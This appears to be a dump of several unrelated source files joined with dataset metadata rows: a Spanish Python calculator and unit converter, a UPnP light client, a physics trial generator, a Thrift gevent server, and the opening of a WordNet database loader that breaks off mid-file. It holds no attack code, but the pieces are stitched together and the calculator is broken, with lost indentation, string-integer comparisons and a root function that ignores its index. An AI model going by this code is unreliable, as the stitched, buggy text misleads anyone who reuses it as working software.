#evitar cierre del programa
while (a==""):
print("Porfavor no deje en espacio vacio ")
a=(input("Numero: "))
i=0
r=0
while(i<a):
#Se ingresan los numeros a sumar
b=int(input("Numero: "))
#Realizamos la operacion
r=r+b
i=i+1
#Y entregamos el resultado
print ("El resultado de la suma es: " +str(suma(r)))
print ("")
"""MULTIPLICACION
En esta funcion se pueden multiplicar dos variables dadas por el usuario y asi obtener un nuevo valor numerico """
elif (n==2): #Multiplicacion
print ("---MULTIPLICACION---")
print ("")
hlp=str(input("Para iniciar la funcion presione 'Enter', pero si no sabe como funciona o necesita ayuda, presione 'h': "))
print ("")
if (hlp=="h" or hlp=="H"):
print ("---Ayuda de Multiplicacion---")
print ("(1) Ingresar la cantidad de numeros a multiplicar")
print ("(2) Ingresar las cifras individualmente y presionar 'Enter' para registrarlas")
print ("(3) Una vez ingresados todos los datos su respuesta se imprimira presionando 'Enter'")
print ("")
#Se ingresan la cantidad de numeros a multiplicar
a=(input("Escriba cantidad de numeros a multiplicar: "))
i=0
r=1
while(a==""):
print("Porfavor no deje el espacio vacio")
a=(input("Escriba cantidad de numeros a multiplicar: "))
while(i<a):
#Se ingresan los numeros que seran multiplicados
b=int(input("Numero: "))
#Obtenemos el resultado
r=r*b
i=i+1
#Imprimimos el resultado
print ("El resultado de la multiplicacion es: " +str(multiplicacion(r)))
"""DIVISION
En esta funcion se va a poder dividir dos valores para asi poder obtener un resultado numerico nuevo
Se utiliza la funcion de numero flotante para que de decimales"""
elif (n==3): #Division
print ("---DIVISION---")
print ("")
hlp=str(input("Para iniciar la funcion presione 'Enter', pero si no sabe como funciona o necesita ayuda, presione 'h': "))
print ("")
if (hlp=="h" or hlp=="H"):
print ("---Ayuda de Division---")
print ("* El programa solo imprime el resultado de la division")
print ("(1) Ingresar el dividendo [El numero a dividir]")
print ("(2) Ingresar el divisor [El numero que dividirá al dividendo]")
print ("(3) Una vez ingresados todos los datos su respuesta se imprimira presionando 'Enter'")
print ("")
#Pedimos el numero que sera dividido
a=(input("Escriba el dividendo: "))
while (not a.isdigit()):
#Si realiza el proceso incorrectamente le pedimos que lo haga de nuevo
print ("Solo se aceptan numeros.")
print ("")
a=(input("Escriba el dividendo: "))
a=float(a)
#Pedimos el numero que va a dividir
b=(input("Escriba el divisor: "))
while (not b.isdigit()):
#Si realiza el proceso incorrectamente le pedimos que lo haga de nuevo
print ("Solo se aceptan numeros.")
print ("")
b=(input("Escriba el divisor: "))
b=float(b)
#Y entregamos el resultado
print ("Su resultado es: " +str(division(a,b)))
"""Aqui implementamos la funcion modulo que es una division que solo nos muestra resultados de enteros """
elif (n==4): #Modulo
print ("---MODULO---")
print ("")
hlp=str(input("Para iniciar la funcion presione 'Enter', pero si no sabe como funciona o necesita ayuda, presione 'h': "))
print ("")
if (hlp=="h" or hlp=="H"):
print ("---Ayuda de Modulo---")
print ("* El programa solo imprime el residuo de la division")
print ("(1) Ingresar el dividendo [El numero a dividir]")
print ("(2) Ingresar el divisor [El numero que dividirá al dividendo]")
print ("(3) Una vez ingresados todos los datos su respuesta se imprimira presionando 'Enter'")
print ("")
#Solicitamos divisor y dividendo
a=(input("Escriba el dividendo : "))
while (not a.isdigit()):
#Si realiza el proceso incorrectamente le pedimos que lo haga de nuevo
print ("Solo se aceptan numeros.")
print ("")
a=(input("Escriba el dividendo: "))
a=int(a)
b=(input("Escriba el divisor: "))
while (not b.isdigit()):
#Si realiza el proceso incorrectamente le pedimos que lo haga de nuevo
print ("Solo se aceptan numeros.")
print ("")
b=(input("Escriba el divisor: "))
b=int(b)
#Entregamos el residuo
print ("Su resultado es: " +str(modulo(a,b)))
"""POTENCIA
La función calculara un numero elevado a cierta potencia.
El usuario puede ingresar el numero base y el exponente que guste para hacer la funcion"""
elif (n==5): #Potencia
print ("---POTENCIA---")
print ("")
hlp=str(input("Para iniciar la funcion presione 'Enter', pero si no sabe como funciona o necesita ayuda, presione 'h': "))
print ("")
if (hlp=="h" or hlp=="H"):
print ("---Ayuda de Potencia---")
print ("(1) Ingresar el numero base [El numero a potenciar]")
print ("(2) Ingresar el exponente [El numero de veces que la base se multiplicara a si misma]")
print ("(3) Una vez ingresados todos los datos su respuesta se imprimira presionando 'Enter'")
print ("")
#Le pedimos al usuario el numero que sera elevado a una potencia
a=float(input("Escriba el numero base: "))
#Le pedimos al usuario la potencia a la que sera elevado el numero
b=float(input("Escriba el exponente: "))
#Entregamos el resultado
print ("Su resultado es: " +str(potencia(a,b)))
"""RAIZ
La función calculara la raiz de un numero cualquiera ingresado por el usuario.
El usuario puede poner como parametro el indice y numero que gusten"""
elif (n==6): #Raiz
print ("---RAIZ---")
print ("")
hlp=str(input("Para iniciar la funcion presione 'Enter', pero si no sabe como funciona o necesita ayuda, presione 'h': "))
print ("")
if (hlp=="h" or hlp=="H"):
print ("---Ayuda de Raiz---")
print ("(1) Ingresar el radicando [El numero del cual se obtendrá la raiz]")
print ("(2) Ingresar el indice [La raiz de la cual se obtendrá el resultado]")
print ("(3) Una vez ingresados todos los datos su respuesta se imprimira presionando 'Enter'")
print ("")
# a es 2 ya que esta es la base para sacar la raiz cuadrada
a=2
#Solicitamos los datos al usuario
#A partir de ahora a puede cambiar si el usuario no quiere sacar raiz cuadrada
b=int(input("Escriba numero del radicando: "))
a=int(input("Escriba a que numero de indice: "))
if (a<=2):
print ("Si el valor es menor que 2, el indice se toma al cuadrado por defecto")
a=2
#Entregamos resultado
print ("Su resultado es: " +str(math.sqrt(b)))
"""VERIFICACION DE NUMEROS PRIMOS
La función demostrara si el numero que ha ingresado el usuario es numero primo o no.
El programa verificara si el numero ingresado el multiplo de sus anteriores.
Caso 1: En caso de que encuentre un multiplo, la función imprimira que no es primo
Caso 2: Si el numero demuestra que no es multiplo de nunguno, la función imprimira que si es primo"""
elif (n==7): #Verificacion de numeros primos
print ("---VERIFICACION DE NUMEROS PRIMOS---")
hlp=str(input("Para iniciar la funcion presione 'Enter', pero si no sabe como funciona o necesita ayuda, presione 'h': "))
print ("")
if (hlp=="h" or hlp=="H"):
print ("---Ayuda de Numeros Primos por Verificacion---")
print ("(1) Ingrese una cifra o numero entero cualquiera")
print ("(2) Una vez ingresado el numero el programa evaluara el numero")
print ("(3) Como resultado, el programa le dira si su numero es primo o no")
print ("")
#a es un contador
a=0
#Solicitamos el numero a verificar
n=int(input("Ingrese numero para verificar si es primo: "))
#Iniciamos con las pruebas
for i in range(1,n+1):
#Si el residuo es 0 le sumamos 1 a la variable a
if(n % i==0):
a=a+1
#Si a no logra sumar dos puntos no es primo
if(a!=2):
print ("El numero "+(str(n)+" no es primo"))
print ("")
else:
print ("El numero "+(str(n)+" si es primo"))
print ("")
"""NUMERO PRIMO POR RANGO
La función demostrara la lista de numeros primos, tomando como limite el numero ingresado por el usuario
El programa verificara si cada numero dentro del rango es multiplo de sus anteriores.
Caso 1: En caso de que encuentre un multiplo, el numero sera desechado por la funcion.
Caso 2: Si el numero demuestra que no es multiplo de nunguno, sera imprimido en pantalla"""
elif (n==8): #Numero Primo por Rango
#a es un contador
a=0
print ("---NUMEROS PRIMOS POR RANGO---")
hlp=str(input("Para iniciar la funcion presione 'Enter', pero si no sabe como funciona o necesita ayuda, presione 'h': "))
print ("")
if (hlp=="h" or hlp=="H"):
print ("---Ayuda de Numeros Primos por Rango---")
print ("(1) Ingresar una cifra para ponerlo como limite de la lista")
print ("(2) Una vez ingresado el numero el programa evaluara los numeros primos dentro del rango")
print ("(3) Como resultado, se generara una lista de numeros primos hasta el numero limite")
print ("")
#Solicitamos el limitede la lista
lim=(input("Ingrese el limite de la lista de numeros primos: "))
while (not lim.isdigit()):
print ("Solo se aceptan numeros.")
print ("")
lim=(input("Ingrese el limite de la lista de numeros primos: "))
lim=int(lim)
print ("")
print ("La lista de numeros primos hasta el numero "+str(lim)+" es:")
print ("")
#Iniciamos con la inspeccion
#El rango va del 2 a el limite establecido
for x in range (2,lim):
prnt=False
verf=0
for i in range(1,x+1):
if(x % i==0):
verf=verf+1
if (prnt==False and verf<3):
#Entregamos resultados
print (str(x))
prnt=True
print ("")
''' BINARIO A HEXADECIMAL
Con esta funcion se logra conbertir un numero que esta en binario a uno en hexadecimal
Se utilizan datos de la libreria matematica como hex.
En el int significa el numero en enteros que sera divido con el 2 de la funcion de binario.
is.digit() permite que no se acepten letras y solo acepte numeros.
'''
elif (n==9): #Binario a Hexadecimal
print ("---BINARIO -> HEXADECIMAL---")
hlp=str(input("Para iniciar la funcion presione 'Enter', pero si no sabe como funciona o necesita ayuda, presione 'h': "))
print ("")
if (hlp=="h" or hlp=="H"):
print ("---Ayuda de Binario -> Hexadecimal---")
print ("(1) Ingresar una cifra en binario. [Recuerde que este sistema usa 1 y 0] y despues presione 'Enter'")
print ("(2) El programa convertirá la cifra a hexadecimal.")
print ("(3) Como resultado, se imprimira en pantalla la cifra convertida a sistema hexadecimal.")
print ("")
print ("-"*50)
numbinario = input("Ingrese un numero binario: ")
print ("-"*50)
while(not numbinario.isdigit()):
print ("Solo se aceptan numeros en binario.")
numbinario = input("Ingrese un numero binario: ")
print ("-"*50)
bina = int(numbinario, 2)
print ("Su numero",numbinario," en hexadecimal es:", hex(bina))
elif (n==10): #Binario a Decimal -- Falta completar
print ("BINARIO -> DECIMAL")
hlp=str(input("Para iniciar la funcion presione 'Enter', pero si no sabe como funciona o necesita ayuda, presione 'h': "))
print ("")
if (hlp=="h" or hlp=="H"):
print ("---Ayuda de Binario a Decimal---")
print ("(1) Ingresar un numero en binario (Recuerde que estos solo llevan 0 y 1) y luego presionar 'Enter'")
print ("(2) Al recibir su numero en forma decimal aparecera una pregunta")
print ("(3) Presione '1' seguido de un 'Enter' para poder introducir otro numero o presione '0' seguido de un 'Enter' para terminar el programa")
print ("")
respuesta=1
while(respuesta==1):
#Primero le pedimos al usuario su numero en binario
binario=input("Introduzca un numero en binario: ")
if(binario is not int):
try:
#Convertimos la variable a entero para que pueda hacer las siguientes
#Comparaciones
binario=int(binario)
if(binario>2):
decimal=int(str(binario), 2)
print ("\nSu numero en decimal es: ")+str(decimal)
#La ultima opcion restante es que sean numeros que no sean 0 o 1
else:
print ("Los NUMEROS binarios solo llevan 0 y 1")
#Pero si no son numeros pasara lo siguiente
except:
print ("Los NUMEROS binarios solo llevan 0 y 1")
respuesta=int(input("Va a introducir otro numero:<Si[1] No[0]>"))
'''Esta funcion de DaH empieza pideiendole al usuario una cifra de entero,
si el valor que se le pone no es un numero, este marcara un error.
.isdigit() cumple la funcion de revisar si existen puros numeros y de este modo
no acepte caracteres de letra.'''
"""Aqui hacemos implementamos la funcion decimal a hexadecimal que lo que hace es transformar
numeros decimales al codigo hexadecimal """
elif (n==11): #Decimal a Hexadecimal
print ("DECIMAL -> HEXADECIMAL")
print ("")
hlp=str(input("Para iniciar la funcion presione 'Enter', pero si no sabe como funciona o necesita ayuda, presione 'h': "))
print ("")
if (hlp=="h" or hlp=="H"):
print ("---Ayuda de Decimal -> Hexadecimal---")
print ("(1) Ingresar una cifra para converir el numero a hexadecimal")
print ("(2) Una vez ingresado el numero, se trasladara a decimal pero contando A, B, C, D, E y F como numeros también.")
print ("(3) Como resultado, el programa le dira el numero que ingreso, pero usando los dieciseis numeros")
print ("")
#Solicitamos un numero
a=(input("Ingrese una cifra en decimal: "))
while (not a.isdigit()):
#Si lo que ingresamos no es un numero le decimos al usuario y le pedimos otro
print ("Solo se aceptan numeros.")
a=(input("Ingrese una cifra en decimal: "))
#Convertimos el numero en entero
a=int(a)
#Entregamos el resultado
print ("Su resultado es: " + format(a, '02x'))
print ("")
"""Aqui hacemos la funcion decimal a binario que se encarga de recibir numeros decimales i tranformarlos a codigo binario"""
elif (n==12): #Decimal a Binario
print ("---DECIMAL -> BINARIO---")
print ("")
hlp=str(input("Para iniciar la funcion presione 'Enter', pero si no sabe como funciona o necesita ayuda, presione 'h': "))
print ("")
if (hlp=="h" or hlp=="H"):
print ("---Ayuda de Decimal -> Binario---")
print ("(1) Ingresar una cifra para converir el numero en binario")
print ("(2) Una vez ingresado el numero, se trasladara a 1s y 0s")
print ("(3) Como resultado, el programa le dira el numero que ingreso, pero en binario")
print ("")
respuesta=1
while(respuesta==1):
numero=input("Ingrese un numero: ")
r=[]
#Las letras y los decimales no se pueden pasar a binario
if(numero is not int):
try:
numero = int(numero)
if(numero==0):
print("0 no se puede convertir a binario")
input()
elif(numero<0):
print("Los numeros menores a 0 no se pueden convertir a binario")
input()
elif(numero>0):
while(numero>0):
#Si el residuo de dividir el elemento[n] del numero entre 2 da 0
#Agregamos 0 a la lista, de lo contratrio agregamos 1
if(numero%2==0):
r.append(0)
else:
r.append(1)
numero=numero/2
#Al tener la lista la invertimos para tener el numero binario verdadero
r.reverse()
print (r)
except:
print("Las letras y los numeros decimales no se pueden convertir a binario")
#El numero tiene que ser mayor que 0 porque los numeros
#menores o iguales no se puede convertir a binario
respuesta=int(input("¿Quieres ingresar otro numero? (Si[1] No[0])"))
print ("")
elif (n==13): #Hexadecimal a Binario (Falta a prueba de errores)
print ("HEXADECIMAL -> BINARIO")
hlp=str(input("Para iniciar la funcion presione 'Enter', pero si no sabe como funciona o necesita ayuda, presione 'h': "))
print ("")
if (hlp=="h" or hlp=="H"):
print ("---Ayuda de Hexadecimal a Binario---")
print ("(1) Escriba una cifra en sistema hexadecimal [Numeros y A,B,C,D,E,F son admitidos]. Luego presionar 'Enter'")
print ("(2) El programá realizará los calculos necesarios para convertir la cifra en binario")
print ("(3) Como resultado se imprimirá el resultado en 1 y 0; Digitos del sistema binario")
print ("")
numero = input("Ingresa un valor hexadecimal :")
print ("-"*50)
a=len(numero)
binnario=0
letras=""
while (binnario < a):
letras=letras+HaB(numero[binnario])
binnario+=1
print ("Tu valor en binario es: ", letras)
""" En esta funcion se puede calcular un numero de hexadecimal a un numero decimal
comenzando por iniciar un ciclo que niegue letras fuera del patron del hexadecima
en este caso solo se permiten de la A a la F."""
elif (n==14): #Hexadecimal a Decimal
print ("HEXADECIMAL -> DECIMAL")
print ("")
hlp=str(input("Para iniciar la funcion presione 'Enter', pero si no sabe como funciona o necesita ayuda, presione 'h': "))
print ("---Ayuda de Hexadecimal -> Decimal---")
print ("")
if (hlp=="h" or hlp=="H"):
print ("(3) Como resultado, se mostrara el numero en sistema decimal")
print ("(2) Presione 'Enter' para que el programa lo convierta a decimal")
print ("(1) Escriba una cifra en sistema hexadecimal [Numeros y A,B,C,D,E,F son admitidos]")
print ("")
# Se hizo la modificacion para que la funcion hexdec funcionara
print ("Que numero hexadecimal quiere convertir: ")
hexdec=(input("Ingresa el numero en hexadecimal: "))
while (hexdec >= 'g'):
print ("No es una letra valida")
hexdec=(input("Ingresa el numero en hexadecimal: "))
dec = int(hexdec, 16)
print (hexdec + " en Decimal es: " + str(dec) +"\n")
"""METROS A YARDAS
Con esta conversion podras facilmente convertir la medida de metro a yardas
Se solicita la cantidad de metros que el usuario quiere transformar luego
multiplica esa cantidad por metro(1)/yarda(.914) y muestra el resultado """
elif (n==15): #Metros a Yardas (Falta completar)
print ("METROS -> YARDAS")
hlp=str(input("Para iniciar la funcion presione 'Enter', pero si no sabe como funciona o necesita ayuda, presione 'h': "))
print ("---Ayuda de Metros -> Yardas---")
print ("")
if (hlp=="h" or hlp=="H"):
print ("(1) Escriba la cantidad de metros que desea convertir")
print ("(2) Presione 'Enter' para que el programa lo convierta a Yardas")
print ("(3) Como resultado, se mostrara la conversi[on de metros(m) a yardas(yd)")
print ("")
#Solicitamos la cantidad de metros a convertir
metros=input("¿Cuantos metros quieres convertir a yardas? ")
while (metros==""):
#Si el usuario no realizo el proceso correctamente le pedimos que lo haga de nuevo
print ("")
print ("Porfavor escoja no deje ese espacio vacio ")
metros=input("¿Cuantos metros quieres convertir a yardas? ")
#Hacemos la conversion
conversion= int(metros)*(int(1)/float(.914))
#Entregamos el resultado
print ("Sus metros en yardas son: "+ str(conversion)+"yd")
"""YARDAS A METROS
Con esta funcion podras transformar Yardas(yd) a Metros(m) en base a una operacion
basada en regla de 3; multiplicando el numero de yardas por el el equivalente de
un metro pero en medias de yardas y dividiendoloe entre 1 para asi mostrar la conversion"""
elif (n==16): #yardas a metros
print ("YARDAS -> METROS")
hlp=str(input("Para iniciar la funcion presione 'Enter', pero si no sabe como funciona o necesita ayuda, presione 'h': "))
print ("---Ayuda de Yardas -> Metros---")
print ("")
if (hlp=="h" or hlp=="H"):
print ("(1) Escriba la cantidad de yardas que desea convertir")
print ("(2) Presione 'Enter' para que el programa lo convierta a Metros")
print ("(3) Como resultado, se mostrara la conversion de Yardas(yd) a Metros(m)")
print ("")
#Solicitamos la cantidad de yardas a convertir
yardas=input("Ingrese el numero de Yardas que quiere transformar a metros: ")
while (yardas==""):
#Si el usuario realiza el proceso mal le pedimos que lo haga de nuevo
print("Porfavor no deje ese espacio en blanco")
yardas=input("Podria ingresar otra vez el numero?: ")
#Hacemos la conversion
Conversion= int(yardas)*float(.9144)/int(1)
#Entregamos el resultado
print ("Sus yardas transformadas a metros son: "+str(Conversion)+"m")
"""CALCULADORA DE IMC
El proposito de esta funcion es el de calcular el indice de masa corporal del usuario.
Los datos del usuario (Peso y Altura) se utilizan como variables para obtener el dato.
El peso se divide entre la altura en metros al cuadrado."""
elif (n==17): #Metros a Pulgadas
print ("Bienvenido al convertidor Metros a Pulgada")
m=(input("Cuantos metros quiere convertir? "))
pulgada=39.3700787402
if (m== " "):
print("Porfavor no deje el espacio en blanco")
m=int(input("Cuantos metros quiere convertir? "))
elif (m<0):
print("no puedes tomar valores negativos")
m=int(input("Cuantos metros quiere convertir? "))
else:
operacion=pulgada*int(m)
print (operacion)
elif(n==18):#Pulgadas a Metros
print ("Bienvenido al convertidor Metros a Pulgada")
p=int(input("Cuantas pulgadas quiere convertir? "))
me=0.0254
operacion=me*int(p)
elif (n==19): #Calculadora de IMC (Falata comentar)
print ("CALCULADORA DE INDICE DE MASA CORPORAL")
print ("")
hlp=str(input("Para iniciar la funcion presione 'Enter', pero si no sabe como funciona o necesita ayuda, presione 'h': "))
print ("")
if (hlp=="h" or hlp=="H"):
print ("---Ayuda de Calculadora de IMC---")
print ("(1) Ingrese su peso en kg. [Kilogramo: 1kg = 1000gr.]")
print ("(2) Ingrese su altura en mt. [Metro: 1mt. = 100cm.]")
print ("(3) Como resultado, el programa le dira su indice de masa corporal.")
print ("")
#Solicitamos el peso del usuario
pes=(input("Ingrese su peso en Kg (Kilogramos): "))
while (not pes.isdigit()):
#Si este no lo realizo correctamente le pedimos que lo haga de nuevo
print ("Solo se aceptan numeros.")
print ("")
pes=(input("Ingrese su peso en Kg (Kilogramos): "))
#Convertimos la cantidad a enteros
pes=int(pes)
#Le pedimos al usuario que introduzca su altura en centimetros
alt=(input("Ingrese su altura en Cm (Centimetros): "))
while (not alt.isdigit()):
#Si realiza el proceso incorrectamente le pedimos que lo haga de nuevo
print ("Solo se aceptan numeros.")
print ("")
alt=(input("Ingrese un altura en Mt (Metros): "))
#Convertimos la altura en un numero flotante
alt=float(alt)
#Realizamos la operacion para calcular el IMC
imc=(pes/((alt/100)**2))
#Entregamos el resultado
print ("Su IMC es de: "+str(imc))
print ("")
else:
print ("No existe ese valor")
#Ejemplo de commit
|
gpl-3.0
| 2,029,962,430,459,301,400
| 40.139053
| 153
| 0.612203
| false
| 2.982618
| false
| false
| false
|
palfrey/coherence
|
coherence/upnp/devices/binary_light_client.py
|
1
|
2116
|
# Licensed under the MIT license
# http://opensource.org/licenses/mit-license.php
# Copyright 2008, Frank Scholz <coherence@beebits.net>
from coherence.upnp.services.clients.switch_power_client import SwitchPowerClient
from coherence import log
import coherence.extern.louie as louie
class BinaryLightClient(log.Loggable):
logCategory = 'binarylight_client'
def __init__(self, device):
self.device = device
self.device_type,self.version = device.get_device_type().split(':')[3:5]
self.icons = device.icons
self.switch_power = None
self.detection_completed = False
louie.connect(self.service_notified, signal='Coherence.UPnP.DeviceClient.Service.notified', sender=self.device)
for service in self.device.get_services():
if service.get_type() in ["urn:schemas-upnp-org:service:SwitchPower:1"]:
self.switch_power = SwitchPowerClient(service)
self.info("BinaryLight %s" % (self.device.get_friendly_name()))
if self.switch_power:
self.info("SwitchPower service available")
else:
self.warning("SwitchPower service not available, device not implemented properly according to the UPnP specification")
def remove(self):
self.info("removal of BinaryLightClient started")
if self.switch_power != None:
self.switch_power.remove()
def service_notified(self, service):
self.info("Service %r sent notification" % service);
if self.detection_completed == True:
return
if self.switch_power != None:
if not hasattr(self.switch_power.service, 'last_time_updated'):
return
if self.switch_power.service.last_time_updated == None:
return
self.detection_completed = True
louie.send('Coherence.UPnP.DeviceClient.detection_completed', None,
client=self,udn=self.device.udn)
def state_variable_change( self, variable):
self.info(variable.name, 'changed from', variable.old_value, 'to', variable.value)
|
mit
| 4,234,525,556,472,552,400
| 38.185185
| 130
| 0.657845
| false
| 3.933086
| false
| false
| false
|
kasmith/cbmm-project-christmas
|
python-trials/batchMakeTrials.py
|
1
|
6661
|
from __future__ import division, print_function
from physicsTable import *
from physicsTable.constants import *
import threading
import pygame as pg
import random, os, sys
import numpy as np
import json
defVel = 300
# modified trial folder:
#trialfolder = os.path.join('..','public_html','trials')
trialfolder = os.path.join('..','psiturk-rg','templates', 'trials')
#random.seed(10001)
def makeRect(ul, lr):
return pg.Rect(ul, (lr[0]-ul[0],lr[1]-ul[1]))
def checkOverlap(trial):
walls = [makeRect(w[0],w[1]) for w in trial.normwalls]
goals = [makeRect(g[0],g[1]) for g in trial.goals]
objs = walls + goals
b = trial.ball
if b is not None:
br = makeRect((b[0][0]-b[2],b[1][0]-b[2]),(b[2]*2,b[2]*2))
objs.append(br)
for i in range(len(objs) - 1):
o = objs[i]
cls = o.collidelist(objs[(i+1):])
if cls != -1: return True
return False
def checkCoverage(trial, minsteps = 20, FPS = 40.):
tb = trial.makeTable()
notcovered = True
covered = False
ncovs = 0
while tb.step(1/FPS) is None:
if tb.fullyOcc():
notcovered = False
ncovs += 1
if ncovs >= minsteps: covered = True
else: ncovs = 0
return [notcovered, covered]
def checkSmallVel(v):
x = abs(v[0])
y = abs(v[1])
atan = np.arctan(y/x)
return (atan < np.pi/40) or (atan > 19*np.pi/40)
def MakeRandTrial(name, blocks, occs, covered = False, blockdims = (50,300), occdims = (150, 400), res = (1000, 620), maxfails = 10000):
retry_flag = True
while retry_flag:
fails = 0
chk = False
tr = RedGreenTrial(name, res, def_ball_vel = defVel)
blocksize = (random.randint(blockdims[0],blockdims[1]),random.randint(blockdims[0],blockdims[1]))
pos = (random.randint(0,res[0]-blocksize[0]),random.randint(0,res[1]-blocksize[1]))
lr = (pos[0]+blocksize[0],pos[1]+blocksize[1])
tr.addGoal(pos,lr,REDGOAL,RED)
chk = False
while not chk:
blocksize = (random.randint(blockdims[0],blockdims[1]),random.randint(blockdims[0],blockdims[1]))
pos = (random.randint(0,res[0]-blocksize[0]),random.randint(0,res[1]-blocksize[1]))
lr = (pos[0]+blocksize[0],pos[1]+blocksize[1])
tr.addGoal(pos,lr,GREENGOAL,GREEN)
if checkOverlap(tr):
fails += 1
tr.goals = [tr.goals[0]]
else: chk = True
if fails > maxfails:
print("Resetting trial")
#return MakeRandTrial(name,blocks,occs,covered,blockdims,occdims,res,maxfails)
continue
for i in range(blocks):
chk = False
while not chk:
blocksize = (random.randint(blockdims[0],blockdims[1]),random.randint(blockdims[0],blockdims[1]))
pos = (random.randint(0,res[0]-blocksize[0]),random.randint(0,res[1]-blocksize[1]))
lr = (pos[0]+blocksize[0],pos[1]+blocksize[1])
tr.addWall(pos,lr)
if checkOverlap(tr):
fails += 1
tr.normwalls = tr.normwalls[:-1]
else: chk = True
if fails > maxfails:
print("Resetting trial")
#return MakeRandTrial(name,blocks,occs,covered,blockdims,occdims,res,maxfails)
continue
for i in range(occs):
chk = False
while not chk:
blocksize = (random.randint(blockdims[0],blockdims[1]),random.randint(blockdims[0],blockdims[1]))
pos = (random.randint(0,res[0]-blocksize[0]),random.randint(0,res[1]-blocksize[1]))
lr = (pos[0]+blocksize[0],pos[1]+blocksize[1])
noc = pg.Rect(pos,blocksize)
if noc.collidelist([makeRect(o[0],o[1]) for o in tr.occs]) == -1:
tr.addOcc(pos,lr)
chk = True
else:
fails += 1
bsize = tr.dbr
chk = False
while not chk:
bpos = (random.randint(bsize, res[0]-bsize), random.randint(bsize,res[1]-bsize))
vchk = False
while not vchk:
bvel = (random.random(), random.random())
if not checkSmallVel(bvel): vchk = True
tr.addBall(bpos, bvel)
if checkOverlap(tr):
fails += 1
tr.ball = None
else: chk = True
if fails > maxfails:
print("Resetting trial")
#return MakeRandTrial(name,blocks,occs,covered,blockdims,occdims,res,maxfails)
continue
tr.normalizeVel()
if not tr.checkConsistency(maxsteps=10000):
#return MakeRandTrial(name,blocks,occs,covered,blockdims,occdims,res,maxfails)
continue
if tr.checkConsistency(maxsteps=3000):
print("Too short")
#return MakeRandTrial(name,blocks,occs,covered,blockdims,occdims,res,maxfails)
continue
coverage = checkCoverage(tr)
if covered:
if not coverage[1]:
#return MakeRandTrial(name,blocks,occs,covered,blockdims,occdims,res,maxfails)
continue
else:
if not coverage[0]:
#return MakeRandTrial(name,blocks,occs,covered,blockdims,occdims,res,maxfails)
continue
retry_flag = False
return tr
def threadMakeTrial(nTrials, b):
for i in range(nTrials):
nm = "RTr_Bl" + str(b) + "_" + str(i)
output_path = os.path.join(output_dir, nm + '.ptr')
if not os.path.exists(output_path):
print('Thread ' + str(b) + ': Trial ' + nm, file=sys.stderr)
t = MakeRandTrial(nm, b, 0)
t.save(output_path, askoverwrite=False)
if __name__ == '__main__':
# First arg is number of trials, since there will be
# 5 block variations for each trial, expect an effective
# total of 5*nTrials.
if len(sys.argv) > 1:
nTrials = int(sys.argv[1])
else:
nTrials = 20
# Create directory for output files
output_dir = 'trials'
if not os.path.exists(output_dir):
os.makedirs(output_dir)
threads = []
# Make random trials
for b in range(1,6):
thr = threading.Thread(target=threadMakeTrial, args=(nTrials, b))
thr.start()
threads.append(thr)
for thread in threads:
thread.join()
|
mit
| 3,735,357,943,701,721,600
| 33.692708
| 136
| 0.545714
| false
| 3.471079
| false
| false
| false
|
ezbake/ezbake-frontend
|
ezReverseProxy/TSSLSocket/TGeventServer.py
|
1
|
1758
|
# Copyright (C) 2013-2014 Computer Sciences Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import gevent
from thrift.server.TServer import TServer
from thrift.transport import TSocket, TTransport
import gevent.socket
TSocket.socket = gevent.socket
class TGEventServer(TServer):
def __init__(self, logger, *args, **kwargs):
TServer.__init__(self, *args)
self._logger = logger
def handle(self, client):
itrans = self.inputTransportFactory.getTransport(client)
otrans = self.outputTransportFactory.getTransport(client)
iprot = self.inputProtocolFactory.getProtocol(itrans)
oprot = self.outputProtocolFactory.getProtocol(otrans)
try:
while True:
self.processor.process(iprot, oprot)
except TTransport.TTransportException, e:
pass
itrans.close()
otrans.close()
def serve(self):
self.serverTransport.listen()
while True:
try:
client = self.serverTransport.accept()
gevent.spawn(self.handle, client)
except KeyboardInterrupt:
raise
except Exception, e:
self._logger.exception(e)
|
apache-2.0
| 8,150,297,926,331,764,000
| 34.16
| 76
| 0.663823
| false
| 4.277372
| false
| false
| false
|
fcbond/OMW
|
omw/bin/load-pwn.py
|
1
|
18238
|
#!/usr/bin/python3
# This script loads PWN in the new OMW schema
# It requires Python3 and NLTK3 installed
import sqlite3, sys, nltk
from nltk.corpus import wordnet as wn
from collections import defaultdict as dd
### ToDo: add antonyms as synset links (?)
### ToDo: examples are being loaded as synset examples, change to sense (?)
# It takes one argument: the name of the db
if (len(sys.argv) != 3):
sys.stderr.write('usage: load-pwn.py DBFILE ILIMAP\n')
sys.exit(1)
else:
u = sys.argv[0]
dbfile = sys.argv[1]
ilimapfile = sys.argv[2]
sys.stderr.write('Found ({}) as the new OMW database.\n'.format(dbfile))
# Verb Frames Names per Verb_id
vframe = dd(lambda: dd(str))
vframe['eng'][1] = "Something ----s"
vframe['eng'][2] = "Somebody ----s"
vframe['eng'][3] = "It is ----ing"
vframe['eng'][4] = "Something is ----ing PP"
vframe['eng'][5] = "Something ----s something Adjective/Noun"
vframe['eng'][6] = "Something ----s Adjective/Noun"
vframe['eng'][7] = "Somebody ----s Adjective"
vframe['eng'][8] = "Somebody ----s something"
vframe['eng'][9] = "Somebody ----s somebody"
vframe['eng'][10] = "Something ----s somebody"
vframe['eng'][11] = "Something ----s something"
vframe['eng'][12] = "Something ----s to somebody"
vframe['eng'][13] = "Somebody ----s on something"
vframe['eng'][14] = "Somebody ----s somebody something"
vframe['eng'][15] = "Somebody ----s something to somebody"
vframe['eng'][16] = "Somebody ----s something from somebody"
vframe['eng'][17] = "Somebody ----s somebody with something"
vframe['eng'][18] = "Somebody ----s somebody of something"
vframe['eng'][19] = "Somebody ----s something on somebody"
vframe['eng'][20] = "Somebody ----s somebody PP"
vframe['eng'][21] = "Somebody ----s something PP"
vframe['eng'][22] = "Somebody ----s PP"
vframe['eng'][23] = "Somebody's (body part) ----s"
vframe['eng'][24] = "Somebody ----s somebody to INFINITIVE"
vframe['eng'][25] = "Somebody ----s somebody INFINITIVE"
vframe['eng'][26] = "Somebody ----s that CLAUSE"
vframe['eng'][27] = "Somebody ----s to somebody"
vframe['eng'][28] = "Somebody ----s to INFINITIVE"
vframe['eng'][29] = "Somebody ----s whether INFINITIVE"
